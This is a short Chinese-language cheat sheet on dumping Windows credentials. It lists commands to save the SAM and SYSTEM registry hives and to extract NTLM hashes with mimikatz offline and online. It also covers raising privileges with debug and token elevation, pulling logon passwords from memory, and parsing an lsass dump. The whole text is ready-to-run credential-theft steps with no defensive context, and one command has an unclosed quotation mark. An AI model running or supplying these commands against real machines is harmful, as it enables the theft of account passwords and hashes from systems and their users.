使用SAM和System文件抓取密碼
導出sam和system文件抓取密碼
reg save hklm\sam sam.hive
reg save hklm\system system.hive
使用mimikatz讀取sam和system文件來獲得NTLM Hash
lsadump::sam /sam:sam.hive /system:system.hive
使用mimikatz直接讀取本地sam文件。
調成debug模式:privilege::debug
將權限提升至system:token::elevate
直接讀取SAM文件:lsadump::sam
使用mimikatz在線讀取SAM文件
不需要先運行mimikatz:
mimikatz "privilege::debug" "log" "sekurlsa::logonpasswords
mimikatz離線讀取lsass.dump
需要先獲得lsass的轉儲文件
使用mimikatz導出lsass.dump文件中的密碼散列值
載入dump文件: sekurlsa::minidump lsass.DMP
導出密碼: sekurlsa::logonPasswords full
